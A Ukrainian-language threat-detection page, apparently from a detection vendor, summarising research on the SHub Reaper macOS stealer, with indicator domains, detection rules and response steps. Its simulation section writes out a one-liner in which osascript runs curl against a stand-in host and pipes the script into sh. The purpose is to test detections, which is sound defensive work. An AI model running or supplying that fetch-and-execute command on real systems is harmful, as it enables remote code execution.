SHub Reaper | macOS Stealer підробляє Apple, Google та Microsoft в єдиному ланцюжку атак
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
У звіті аналізується новий варіант інфоркрадача для macOS під назвою SHub Reaper, який використовує підроблені інсталяційні файли WeChat та Miro для доставки шкідливого AppleScript через домен-топоклонку в стилі Microsoft. Після запуску в Редакторі скриптів цей шкідливий код збирає дані браузера, файли криптовалютних гаманців та інформацію у зв’язці ключів, а потім ексфільтрує викрадений вміст у вигляді сегментованих архівів ZIP. Зловмисне програмне забезпечення також втручається у файли гаманців і встановлює стійкість через LaunchAgent, замаскований під оновлення програмного забезпечення Google. Рекомендовано зосередитись на виявленні виконання AppleScript, створенні підозрілих LaunchAgent та вихідному трафіку до відомої інфраструктури командування і управління.
Дослідження
SentinelOne відстежив повний багатоетапний ланцюжок доставки, включаючи зловживання схемою applescript:// , динамічну генерацію AppleScript та модуль захоплення файлів, що імітує поведінку крадіжки документів, як видно в AMOS. Дослідники зафіксували мережевий трафік до домену командування і управління hebsbsbzjsjshduxbs.xyz та пов’язаних з ним кінцевих точок, а також створення тимчасових файлів у /tmp та LaunchAgent, розміщеного в каталозі бібліотеки користувача. Дослідження також виявило жорстко закодовану функціональність Telegram-бота, яка використовується для телеметрії оператора.
Заходи
Захисникам слід блокувати доступ до доменів mlcrosoft.co.com, qq-0732gwh22.com, та mlroweb.com, а також стежити за LaunchAgent, створеними за шляхами, що імітують компоненти оновлень Google. Слід використовувати вказувальний список дозволених додатків, щоб обмежити виконання AppleScript з ненадійних джерел, і суворо дотримуватись перевірки підпису коду. Мережеві виявлення також повинні сповіщати про зв’язок з ідентифікованим командним доменом та відомими API шляхами.
Відповідь
Якщо виявлено активність SHub Reaper, негайно ізолюйте уражену кінцеву точку, завершите будь-які підозрілі процеси AppleScript або LaunchAgent та видаліть шкідливі файли із /tmp та бібліотеки користувача. Дослідники потім повинні провести повну форензичну збірку магазинів даних браузера, директорій гаманців та сховищ облікових даних, з подальшою зміною облікових даних при підозрі на компрометацію. Ідентифікована інфраструктура командування і контролю повинна бути заблокована, а команда реагування на інциденти має розпочати більш широке полювання на загрози в середовищі.
Потік атаки
Виявлення
Можлива спроба перегляду IP-адрес домену (через dns)
Перегляд
Примусове підписання коду модифікованого пакету додатків (через cmdline)
Перегляд
Утиліта архівації MacOS вказує на підозрілий каталог (через cmdline)
Перегляд
Підозріла спроба виконання curl [MacOS] (через cmdline)
Перегляд
Архів був створений у тимчасовій папці MacOS (через file_event)
Перегляд
Можливе маніпулювання закодованими рядками Base64 (через cmdline)
Перегляд
Індикатори компрометації (HashSha256) для виявлення: SHub Reaper | macOS Stealer імітує Apple, Google та Microsoft в одній ланцюжку атаки
Перегляд
Індикатори компрометації (HashMd5) для виявлення: SHub Reaper | macOS Stealer імітує Apple, Google та Microsoft в одній ланцюжку атаки
Перегляд
Виявлення ланцюга інфікування SHub Reaper з використанням доменів-топоклонок і C2 [Webserver]
Перегляд
Виявлення виконання зловмисного ПЗ SHub Reaper через AppleScript та Curl [Linux Process Creation]
Перегляд
Виконання симуляції
Попередня умова: Телеметрія та перевірка базового стану перед польотом повинні були пройти.
Мотивація: Цей розділ детально описує точне виконання техніки супротивників (TTP), призначену для ініціювання правила виявлення. Команди та наративи ПОВИННІ безпосередньо відображати ідентифіковані TTP та націлюватися на генерування точної телеметрії, очікуваної логікою виявлення. Абстрактні чи недоречні приклади призведуть до неправильної діагностики.
-
Розповідь про атаку та команди:
Атакуючий створює лаконічну команду, яка використовуєosascriptдля виконання команди оболонки. У межах AppleScriptdo shell scriptзапускаєcurlщоб завантажити віддалений скрипт оболонки (payload.sh) і одразу передає йогоshдля виконання. Оскільки весь ланцюжок вбудований у єдине викликання AppleScript, macOS логує одинprocess_creationподію, чия командна лінія містить обидваosascriptandcurl, задовольняючи правило виявлення. -
Регресивний тестовий скрипт:
#!/bin/bash # # Імітує виконання SHub Reaper на macOS # Генерує одну подію process_creation, що містить 'osascript' та 'curl' # MALICIOUS_URL="https://malicious.example.com/payload.sh" # Однорядкове: osascript запускає команду оболонки, що завантажує навантаження і виконує його osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh"" -
Команди очищення:
#!/bin/bash # # Очистити всі артефакти, створені симуляцією. # Навантаження виконується в пам'яті і не записує файли, але ми впевнюємося, що немає залишкових процесів. # # Вбити всі сторонні процеси 'sh', запущені тестом (використовувати обережно в робочих системах) pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"